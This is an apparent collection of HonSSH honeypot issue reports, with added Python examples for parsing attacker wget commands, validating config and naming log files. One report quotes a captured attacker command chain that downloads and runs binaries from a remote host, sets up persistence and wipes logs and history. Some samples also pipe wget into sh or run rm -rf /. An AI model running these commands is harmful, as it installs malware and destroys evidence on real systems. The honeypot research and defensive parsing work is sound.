2014-06-03 12:13:35+0200 [HonsshServerTransport,1,1.2.3.4] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 323, in runReactorWithLogging
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 599, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.readConnectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 257, in readConnectionLost
self.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 277, in connectionLost
protocol.connectionLost(reason)
File "/opt/honssh/honssh/server.py", line 82, in connectionLost
self.out.connectionLost()
File "/opt/honssh/honssh/output.py", line 82, in connectionLost
self.email('HonSSH - Attack logged', self.txtlog_file)
File "/opt/honssh/honssh/output.py", line 241, in email
fp = open(self.txtlog_file, 'rb')
exceptions.IOError: [Errno 2] No such file or directory: 'sessions/1.2.3.4/20140603_121316.log'
2014-06-03 12:13:35+0200 [HonsshClientTransport,client] connection lost
"""
What version of the product are you using?
26d635886db9
On what operating system?
Ubuntu 12.04 LTS
Please provide any additional information below.
I remember we spoke about changing the logs that were generated, could it be
that 'sessions/1.2.3.4/20140603_121316.log' is a non-existing log file name?
Original issue reported on code.google.com by [email protected]
on 3 Jun 2014 at 10:23
HonSSH is already registering the downloaded files in the honssh.log.
It's not a great inconvenience doing some scripted tasks to extract them from
those files, but it would be awesome to get them in a separate log file if
possible.
Maybe the log could have a format like this or similar?
2014-06-01 20:51:32, http://1.1.1.1/bacdoor, Size: 251Kb, MD5 hash: 42d1eea045ed9a267041a64d2f4f1b53, sessions/2.3.4.5/downloads/bacdoor
This would also help with submitting the hash to VirusTotal and also seeing if
the attackers pull the same versions of malware.
Original issue reported on code.google.com by [email protected]
on 1 Jun 2014 at 7:01
Include the ability to log data to an SQL database, like Kippo.
ETA: ???
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:32
What steps will reproduce the problem?
1. The attacker has found the login to the honeypot
2. The attacker executes a series of commands while logging in (I've seen more
and more of this behavior lately), some of which include wget command(s);
the files are not caught by HonSSH.
Example:
ssh -l root blacks.trollpot.biteme /etc/init.d/iptables stop\necho "nameserver
8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" >>
/etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /root; chmod
7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall -9 joudckfr\nkillall -9
www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 .Mm2\nkillall -9
acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 QQ\nkillall -9 g3\nkillall
-9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 qweasd\nkillall -9
tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall -9 xudp\nkillall -9
txma\nkillall -9 mrdos64.b00\nkillall -9 mrdos32.b00\nkillall -9
kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 jibateng\ncd /root;rm -rf
dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm -rf dir atddd\ncd /etc;rm
-rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd /etc;rm -rf dir sksapdd\ncd
/etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir xfsdxd\ncd /etc;rm -rf dir
fake.cfg\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm
-rf dir cupsddd.*\ncd /etc;rm -rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd
/etc;rm -rf dir kysapdd.*\ncd /etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir
skysapdd.*\ncd /etc;rm -rf dir xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm
-rf dir atdd\ncd /etc;rm -rf dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm
-rf dir sksapd\ncd /etc;rm -rf dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd
/etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm -rf dir
atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd /etc;rm -rf dir kysapd.*\ncd /etc;rm -rf
dir sksapd.*\ncd /etc;rm -rf dir skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd
/var/spool/cron; rm -rf dir root.*\ncd /var/spool/cron; rm -rf dir root\ncd
/var/spool/cron/crontabs; rm -rf dir root.*\ncd /var/spool/cron/crontabs; rm
-rf dir root\ncd /var/spool/cron ;wget http://sketchy.ip.address/root\ncd
/var/spool/cron/crontabs ;wget http://sketchy.ip.address/root\ncd /etc;wget
http://sketchy.ip.address/cupsdd\ncd /etc;wget
http://sketchy.ip.address/ksapdd\ncd /etc;wget
http://sketchy.ip.address/kysapdd\ncd /etc;wget
http://sketchy.ip.address/atddd\ncd /etc;wget
http://sketchy.ip.address/skysapdd\ncd /etc;wget
http://sketchy.ip.address/sksapdd\ncd /etc;wget
http://sketchy.ip.address/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >>
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i
cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i
cupsdd\nrm -rf /root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd
/var/log > dmesg \ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd
/var/log > boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log >
cups \ncd /var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log >
faillog \ncd /var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog
\ncd /var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log >
anaconda.log \ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log >
wtmp\ncd /var/log > utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd
/var/log > sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root >
.bash_history\nhistory -c\necho
What is the expected output?
There are a number of files being downloaded here
(http://sketchy.ip.address/[filename])
that I would expect to be downloaded by HonSSH.
What do you see instead?
Only what is shown above.
What version of the product are you using? On what operating system?
b9880b4e367b
Please provide any additional information below.
Not sure if this is caused by running the commands at login, that there are
multiple wget commands, or something else.
Original issue reported on code.google.com by [email protected]
on 10 Mar 2014 at 10:29
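Added example, not HonSSH's own code: a URL extractor for the wget cases in this report and the earlier semicolon-glued one (and the greedy matching of whole "wget" command lines noted in another issue). It splits the captured command line on shell separators while honouring quotes, so only URL strings leave the parser and the attacker's command is never handed to a shell; going beyond the page, it also recognizes curl. Sample command lines are constructed from the ones quoted above (with real newlines where the paste shows \n), and download_record follows the downloads-log format proposed in another issue on this page, with the size in bytes.

```python
import hashlib
import os
import re
import shlex
from urllib.parse import urlparse

# Tools whose arguments are searched for URLs (curl is an addition; HonSSH's
# feature looked for wget only).
DOWNLOADERS = {"wget", "curl"}
URL_SCHEMES = {"http", "https", "ftp"}
# A token made only of these characters ends a simple command:
# ';', '&&', '||', '|', '&', '(' and ')'.
CONTROL_CHARS = set(";&|()")


def split_commands(cmdline):
    """Split a captured command line into one argv list per simple command.

    Newlines end a command as in a shell; quotes are honoured, so
    'echo "wget http://x; y"' stays one word. A line with an unbalanced quote
    falls back to a crude split rather than losing the whole command line.
    """
    commands = []
    for line in cmdline.splitlines():
        try:
            lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
            lexer.whitespace_split = True   # keep 'http://host/path' as one word
            lexer.commenters = ""           # '#' inside a URL is not a comment
            tokens = list(lexer)
        except ValueError:                  # e.g. "No closing quotation"
            tokens = re.findall(r"[;&|()]+|[^\s;&|()]+", line)
        argv = []
        for tok in tokens:
            if tok and set(tok) <= CONTROL_CHARS:
                if argv:
                    commands.append(argv)
                argv = []
            else:
                argv.append(tok)
        if argv:
            commands.append(argv)
    return commands


def extract_download_urls(cmdline):
    """URLs passed to wget/curl anywhere in the command line, in order, deduplicated."""
    urls = []
    for argv in split_commands(cmdline):
        if os.path.basename(argv[0]) not in DOWNLOADERS:
            continue
        for arg in argv[1:]:
            if arg.startswith("-"):         # option such as -O, -q, --timeout=5
                continue
            parsed = urlparse(arg)
            if parsed.scheme in URL_SCHEMES and parsed.netloc and arg not in urls:
                urls.append(arg)
    return urls


def fetch_argv(url, dest_path, timeout=30):
    """argv for fetching one extracted URL on the HonSSH host via subprocess
    without a shell, so nothing from the attacker's command line is executed."""
    return ["wget", "-q", "--timeout=%d" % timeout, "--tries=1", "-O", dest_path, url]


def download_record(when, url, data, saved_path):
    """One line for a separate downloads log: time, URL, size, MD5, local path."""
    return "%s, %s, Size: %d bytes, MD5 hash: %s, %s" % (
        when, url, len(data), hashlib.md5(data).hexdigest(), saved_path)


# Constructed samples modelled on the command lines quoted in the issues.
SAMPLE_GLUED = "wget http://1.2.3.4/FILENAME;chmod 777 FILENAME;./FILENAME;rm -rf FILENAME;"
SAMPLE_GREEDY = "wget http://1.2.3.4/x && rm -rf /"
SAMPLE_LOGIN = (
    'echo "nameserver 8.8.8.8" >> /etc/resolv.conf\n'
    "cd /etc;wget http://sketchy.ip.address/cupsdd\n"
    "cd /etc;wget http://sketchy.ip.address/ksapdd\n"
    "nohup /etc/cupsdd > /dev/null 2>&1&"
)

if __name__ == "__main__":
    for sample in (SAMPLE_GLUED, SAMPLE_GREEDY, SAMPLE_LOGIN):
        print(extract_download_urls(sample))
```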
It looks like if an attacker creates a reverse SSH connection this does not get
intercepted and the reverse connection request is sent to the honeypot
ssh-server.
Original issue reported on code.google.com by [email protected]
on 28 Feb 2014 at 7:48
There is a problem with backslashes in the session command log files. Under
investigation.
Original issue reported on code.google.com by [email protected]
on 13 Aug 2013 at 8:15
2014-03-03 07:25:14 - Incoming connection from: 61.174.51.200:2629 - SSH-2.0-libssh2_1.4.2
2014-03-03 07:25:14 - Failed login - Username:root Password:admin
2014-03-03 07:25:14 - Successful login - Username:root Password:123456
2014-03-03 07:25:16 - New message 98 type detected - Please raise a HonSSH issue on google code with the details: subsystem
2014-03-03 07:25:16 - RAW CLIENT-SERVER: '\x00\x00\x00\x05\x01\x00\x00\x00\x03'
2014-03-03 07:25:17 - Lost connection from: 61.174.51.200
Please let me know if I can provide any more details.
Original issue reported on code.google.com by [email protected]
on 3 Mar 2014 at 12:38
HonSSH does not currently support two simultaneous channels over one connection
e.g. terminal and sftp
Original issue reported on code.google.com by [email protected]
on 15 Jun 2014 at 5:25
What steps will reproduce the problem?
1. Start honssh
2. SSH in with command on command line
3. Get h4x0r3d without logs of it
What is the expected output? What do you see instead?
The command. Just a log
What version of the product are you using? On what operating system?
The version in the repos from 28Feb
Please provide any additional information below.
The following command executes on the honeypot, but there is no log of it:
ssh -p 2222 root@honeypot 'echo foo > bar'
Original issue reported on code.google.com by [email protected]
on 2 Mar 2014 at 6:48
Hi Thomas,
This is only a suggestion for the mail templates that are being used by HonSSH.
It would be nice to get the country of origin added to the templates as well.
- The current output looks like this:
2014-08-09 22:46:33 - Incoming connection from: 8.8.8.8:42316 - SSH-2.0-libssh-0.4.8
2014-08-09 22:46:33 - Successful login - Username:root Password:root
- My suggestion is changing it to something like this:
2014-08-09 22:46:33 - Incoming connection from: 8.8.8.8:42316 - United States - SSH-2.0-libssh-0.4.8
2014-08-09 22:46:33 - Successful login - Username:root Password:root
Maybe it would be possible to add it using something similar to this?
import GeoIP

def cname(ipv4_str):
    """Checks the ipv4_str against the GeoIP database. Returns the full country name of origin if
    the IPv4 address is found in the database. Returns None if not found."""
    geo = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
    country = geo.country_name_by_addr(ipv4_str)
    return country
//Are
Original issue reported on code.google.com by [email protected]
on 9 Aug 2014 at 9:25
What steps will reproduce the problem?
hello,
I've been trying to set up honssh to work in a virtual (vmware) environment;
unfortunately I'm unable to get a good config.
config info (relevant to my issue):
ssh_addr = 192.168.1.75 -- honssh is running here
ssh_port = 2222
client_addr = 192.168.1.1
honey_addr = 192.168.1.211 -- vulnerable machine is running here
What is the expected output? What do you see instead?
Testing to log into the honeypot,
What I'm seeing is:
root@internet# ssh 192.168.1.75 -p 2222
Connection closed by 192.168.1.75
What version of the product are you using? On what operating system?
OS latest Ubuntu distribution x32
I believe I'm using the latest version: "git clone https://code.google.com/p/honssh"
Please provide any additional information below.
I'll be keeping an eye on this thread; if there is any info you'd like to know
from me I'll try to answer as fast as possible.
Thanks,
Dan.
Original issue reported on code.google.com by [email protected]
on 16 Feb 2014 at 1:51
As discussed
Original issue reported on code.google.com by [email protected]
on 16 Aug 2014 at 1:29
What steps will reproduce the problem?
1.
Enter an invalid IP into honssh.cfg, "ssh_addr = 0.0.0."
2.
Execute honsshctrl.sh.
# ./honsshctrl.sh START
Starting honssh in background...
2014-05-04 16:01:35+0200 [-] Log opened.
2014-05-04 16:01:35+0200 [-] Starting factory
<honssh.client.HonsshSlimClientFactory instance at 0x2f75ef0>
2014-05-04 16:01:35+0200 [-] Loaded.
2014-05-04 16:01:35+0200 [-] Log opened.
2014-05-04 16:01:35+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-04 16:01:35+0200 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
#
HonSSH appears to start and creates the honssh.pid file, but (for obvious
reasons) you will not be able to stop it.
# ./honsshctrl.sh STOP
Attempting to stop HonSSH (1355)...
ERROR: Unable to stop HonSSH (1355)
#
3.
Checking the honssh.log I see this.
- Log error from malformed IP address "0.0.0.".
2014-05-04 16:01:36+0200 [-] twisted.internet.error.CannotListenError: Couldn't listen on 0.0.0.:22: [Errno -2] Name or service not known.
- Log error from an invalid port number "222222"
2014-05-04 16:04:41+0200 [-] OverflowError: getsockaddrarg: port must be 0-65535.
What is the expected output?
It's easy enough to find the cause of the issue in the honssh.log,
but it would be nice to have these lines sent to stdout as well.
What version of the product are you using?
b13ef1d01b16
On what operating system?
Ubuntu server 12.04 LTS
Please provide any additional information below.
Haven't used HonSSH for a while.
Awesome to see what you've accomplished over the last weeks :D
//Are
Original issue reported on code.google.com by [email protected]
on 4 May 2014 at 2:13
What steps will reproduce the problem?
1.
Cloned honssh to server
2.
Started honssh using start.sh
3.
Testing to login in to honeypot. Was able to log in but when issuing any
commands, such as 'ls', the connection is closed.
What is the expected output?
The expected output, on the client side, would be the result of the command
executed on the server.
The expected output, on the server side (honssh), would be the executed
commands being populated in the current honssh.log.
What do you see instead?
- On the client side:
root:~# lsConnection to 11.22.33.44 closed by remote host.
Connection to 11.22.33.44 closed.
- On the server side, in honssh.log
2014-02-15 15:12:20+0100 [HonsshServerTransport,0,11.22.33.44] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
why = selectable.doRead()
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in doRead
return self._dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 221, in _dataReceived
rval = self.protocol.dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/home/loke/honssh/honssh/server.py", line 131, in dispatchMessage
if self.cfg.get('extras', 'file_download') == 'true':
File "/usr/lib/python2.7/ConfigParser.py", line 618, in get
raise NoOptionError(option, section)
ConfigParser.NoOptionError: No option 'file_download' in section: 'extras'
2014-02-15 15:12:20+0100 [HonsshServerTransport,0,11.22.33.44] connection lost
What version of the product are you using?
Rev 7ceb089043af
On what operating system?
Ubuntu 13.10
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 15 Feb 2014 at 2:23
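Both reports above come down to configuration handling: a malformed ssh_addr or ssh_port is only discovered when the listener fails inside twistd, and a missing file_download option in [extras] surfaces as a NoOptionError on the first channel request rather than at startup. The following added example, which is not HonSSH code, validates those values before anything listens and reads the optional flag with a safe default. The sample honssh.cfg text is constructed from the values in the reports; the [honeypot] section name is an assumption, since the page shows the keys but not the section they live in.

```python
import configparser
import ipaddress
import sys

# Constructed sample config carrying the two malformed values from the first
# report and no 'file_download' option in [extras] as in the second report.
# Section name [honeypot] is assumed; it is not taken from the page.
SAMPLE_CFG = """
[honeypot]
ssh_addr = 0.0.0.
ssh_port = 222222
client_addr = 192.168.1.1
honey_addr = 192.168.1.211

[extras]
"""


def load_config(text):
    """Parse config text into a ConfigParser (read_string instead of a file path)."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    return cfg


def validate_config(cfg):
    """Return a list of human-readable problems; an empty list means the config is usable.

    Every address key must be a syntactically valid IP and the port must fit
    in 0-65535, which is what getsockaddrarg enforces later anyway.
    """
    problems = []
    for key in ("ssh_addr", "client_addr", "honey_addr"):
        value = cfg.get("honeypot", key, fallback=None)
        if value is None:
            problems.append(f"[honeypot] {key} is missing")
            continue
        try:
            ipaddress.ip_address(value)
        except ValueError:
            problems.append(f"[honeypot] {key} = {value!r} is not a valid IP address")
    port_raw = cfg.get("honeypot", "ssh_port", fallback="22")
    try:
        port = int(port_raw)
    except ValueError:
        port = -1
    if not 0 <= port <= 65535:
        problems.append(f"[honeypot] ssh_port = {port_raw!r} must be an integer 0-65535")
    return problems


def file_download_enabled(cfg):
    """Read [extras] file_download, defaulting to off when the option is absent.

    Using fallback= avoids the NoOptionError traceback that tore down the
    session in the second report; an unset option means 'do not download'.
    """
    return cfg.getboolean("extras", "file_download", fallback=False)


def check_and_report(text):
    """Validate config text, printing each problem to stdout so it is seen
    by whoever starts the service, not only by the honssh.log reader."""
    problems = validate_config(load_config(text))
    for p in problems:
        print("CONFIG ERROR:", p)
    return problems


if __name__ == "__main__":
    sys.exit(1 if check_and_report(SAMPLE_CFG) else 0)
```

Running the check from the start script before twistd is launched means a bad config never produces a half-started daemon with a stale pid file.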
wget ([^;&|\\]+)
Original issue reported on code.google.com by [email protected]
on 25 May 2014 at 8:39
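The regex above stops the capture at shell operators, which fixes the "wget file && rm -rf /" problem mentioned in the earlier report, but it still captures every argument after wget (options, output paths) rather than just the link. The following added example, which is not HonSSH code, tokenises the attacker's command line with shlex, cuts at shell operators, and returns only arguments that look like a fetchable URL, so the honeypot can retrieve the file itself without ever executing any part of the command. The sample command lines and the .invalid hostnames are constructed.

```python
import re
import shlex

# The expression proposed in the issue above, for comparison.
ISSUE_REGEX = re.compile(r"wget ([^;&|\\]+)")

# Tokens that terminate a simple command; everything after them belongs to
# the next command and must never be treated as a wget argument.
SHELL_OPERATORS = {";", "&&", "||", "|", "&", "(", ")"}

# Only schemes the downloader is prepared to fetch; anything else is logged, not fetched.
URL_RE = re.compile(r"^(https?|ftp)://[^\s'\"]+$")


def issue_regex_capture(cmdline):
    """What the issue's regex would hand to the downloader (None if no match)."""
    m = ISSUE_REGEX.search(cmdline)
    return m.group(1).strip() if m else None


def tokenize(cmdline):
    """Split a command line like a POSIX shell would, keeping operators as tokens.

    Raises ValueError on unbalanced quotes, which the caller treats as 'no URL'.
    """
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def extract_wget_urls(cmdline):
    """Return only the URLs passed to wget commands in cmdline.

    Nothing else from the line (options, output paths, chained commands) is
    returned, so the result is safe to hand to a downloader that fetches by URL.
    """
    try:
        tokens = tokenize(cmdline)
    except ValueError:
        return []  # unbalanced quoting: keep the raw line in the log, fetch nothing
    urls = []
    in_wget = False
    for tok in tokens:
        if tok in SHELL_OPERATORS:
            in_wget = False          # a new simple command starts after an operator
        elif tok == "wget":
            in_wget = True
        elif in_wget and URL_RE.match(tok):
            urls.append(tok)
    return urls


if __name__ == "__main__":
    for line in ("wget http://malware.invalid/a.sh && rm -rf /",
                 "wget -O /tmp/x http://malware.invalid/b | sh"):
        print(repr(line))
        print("  regex capture:", issue_regex_capture(line))
        print("  urls only    :", extract_wget_urls(line))
```

The separate URL allowlist matters as much as the operator cut: a bare "wget file" matches the regex but names no remote resource, and a file:// or other scheme should be recorded rather than passed to a fetcher.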
Ref Are.
Original issue reported on code.google.com by [email protected]
on 14 Sep 2014 at 2:00
What steps will reproduce the problem?
There is no issue, it's a question/request :)
What is the expected output?
n/a
What do you see instead?
n/a
What version of the product are you using?
Latest
On what operating system?
OpenBSD 5.4
Please provide any additional information below.
Sorry to be submitting a ticket for this, it's not really an issue with HonSSH
itself, but I do have a few questions and a feature request. I apologize in
advance if you do not handle this type of submission.
-----------------------------
Feature requests:
1)
When HonSSH downloads a file it's stored in the 'downloads' directory.
In 'honssh/server.py' it will first check if 'downloads' exists and create it
if False. My suggestion is to separate the downloaded files by dates.
Example:
downloads/2014.02.15_malware
downloads/2014.02.22_malware
downloads/2014.02.23_malware
Instead of just testing for the 'downloads' directory I would like to test for
'downloads/YYYY.mm.dd_malware' instead.
2)
Using dates in files.
Some of the files that HonSSH create (tty logs) contain spaces and semicolons.
Would you be willing to change the format of this to something like
'YYYY.mm.dd_HHMMSS'?
-----------------------------
It's not really a big issue, but I basically have to edit the source each time
you release a new version - yes, I might be a bit lazy :P
-----------------------------
Questions:
I'm going to deploy a large scale honey net (+100 nodes) and HonSSH will be the
'bread and butter' of this deployment and I have a few questions about what
HonSSH is capable of doing.
The general layout of the honey net will look like this
- Topology:
INTERNETZ ====== HONSSH ===== LARGE SCALE HONEYNET
HonSSH will be used on an OpenBSD firewall/NAT device (physical hardware) with
its external network interface connected directly to the network of our ISP and
will be assigned its IP address through DHCP.
In 'honssh.cfg' I have to define the IP address of the external network card
(ssh_addr), this might be a slight issue as it's assigned by DHCP (ISP assigns a
new one each 8 - 15 days). Would it be possible to use a FQDN (DDNS) instead of
an IP address here? If not, do you have any suggestions to solve this?
-----------------------------
Again, sorry if this falls outside the scope of your tickets.
HonSSH is the most promising project in the realm of high interaction honeypot
solutions I've seen since....well...basically ever, many thanks for your work
on this.
Kind regards,
B.September
Original issue reported on code.google.com by [email protected]
on 23 Feb 2014 at 4:05
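The two feature requests above (date-separated download directories and tty log names without spaces or semicolons) are small path-construction rules, but getting them wrong produces file names that break shell tooling and log parsers. The following added example, which is not HonSSH code, implements both rules as pure functions of a timestamp so they can be checked without touching the real downloads directory; the peer-address suffix on the tty log name and the ".log" extension are assumptions for the example, and the timestamps are constructed from the dates quoted in the request.

```python
import os
import re
import tempfile
from datetime import datetime

# Characters allowed in generated file names: no spaces, no ';', nothing a
# shell or a log parser would treat specially.
UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def download_dir_for(day, base="downloads"):
    """base/YYYY.mm.dd_malware for the given day, as requested above."""
    return os.path.join(base, day.strftime("%Y.%m.%d_malware"))


def ensure_download_dir(day, base="downloads"):
    """Create the per-day directory if needed and return its path.

    Replaces a bare 'does downloads exist' check: the day directory is
    tested and created on every download, so day rollover needs no restart.
    """
    path = download_dir_for(day, base)
    os.makedirs(path, exist_ok=True)
    return path


def tty_log_name(started, peer_ip, suffix=".log"):
    """Build YYYY.mm.dd_HHMMSS_<peer><suffix> with only safe characters.

    The peer suffix is an assumption for this example; the request only asks
    for the timestamp format.
    """
    stamp = started.strftime("%Y.%m.%d_%H%M%S")
    safe_peer = UNSAFE_CHARS.sub("_", peer_ip)
    return f"{stamp}_{safe_peer}{suffix}"


def is_safe_filename(name):
    """True when the name contains only allowed characters and is not a dot entry."""
    return bool(name) and name not in (".", "..") and UNSAFE_CHARS.search(name) is None


def demo():
    """Run the rules over constructed timestamps; returns the results for inspection."""
    day = datetime(2014, 2, 15, 15, 12, 20)          # constructed, matches the request's first date
    base = tempfile.mkdtemp(prefix="honssh_example_")  # scratch base so nothing real is touched
    created = ensure_download_dir(day, base)
    tty = tty_log_name(day, "11.22.33.44")            # peer from the earlier report's log excerpt
    old_style = "2014-02-15 15:12:20;11.22.33.44"      # constructed: the kind of name the request objects to
    return {
        "dir": download_dir_for(day),
        "created_exists": os.path.isdir(created),
        "tty": tty,
        "tty_safe": is_safe_filename(tty),
        "old_style_safe": is_safe_filename(old_style),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```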
Hi Peg.
Not sure if this is a pure HonSSH issue or not, but I'd be grateful if you
would have a look at it.
After an attack it looks like HonSSH keeps the sessions open:
tcp 0 0 88.222.55.22.22 117.21.191.209.4454 ESTABLISHED
tcp 0 0 88.222.55.22.22 117.21.191.209.2349 ESTABLISHED
tcp 0 0 88.222.55.22.22 117.21.191.208.4575 ESTABLISHED
tcp 0 0 88.222.55.22.22 61.174.51.218.3577 ESTABLISHED
tcp 0 0 88.222.55.22.22 61.174.51.217.1498 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.2490 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.1456 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.2814 ESTABLISHED
tcp 0 0 *.22 *.* LISTEN
At first I thought it was the attacker(s) that kept the sessions open, but
tcpdump does not show any packets being sent or received.
I also tried configuring my firewall to be more aggressive in expiring
inactive sessions.
I've only found two workarounds for this issue
1) restart HonSSH
2) reboot the router
What version of the product are you using?
b9880b4e367b
On what operating system?
OpenBSD 5.3 amd64
OpenBSD 5.4 amd64
Please provide any additional information below.
The issue is intermittent. HonSSH (and the firewall) is able to expire most
sessions so it might be an issue with the client side(?). I've attached logs and
adv-logs for you, hopefully you can make some sense of this.
Cheers,
Black September.
Original issue reported on code.google.com by [email protected]
on 15 Mar 2014 at 10:37
Attachments:
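The netstat listing in the report above is the visible symptom: several ESTABLISHED sessions to port 22 from the same remote host with no traffic behind them. The following added example, which is not HonSSH code, parses that BSD-style netstat output (host and port joined by a dot) to flag remote hosts holding an unusual number of concurrent sessions, and shows the proxy-side mitigation of tracking last activity per session and reaping the idle ones instead of waiting for the firewall. The netstat lines are copied from the report; the session identifiers and timestamps in the reaper demo are constructed.

```python
from collections import Counter

# Netstat output as quoted in the report above (BSD format: host.port columns).
NETSTAT_SAMPLE = """\
tcp 0 0 88.222.55.22.22 117.21.191.209.4454 ESTABLISHED
tcp 0 0 88.222.55.22.22 117.21.191.209.2349 ESTABLISHED
tcp 0 0 88.222.55.22.22 117.21.191.208.4575 ESTABLISHED
tcp 0 0 88.222.55.22.22 61.174.51.218.3577 ESTABLISHED
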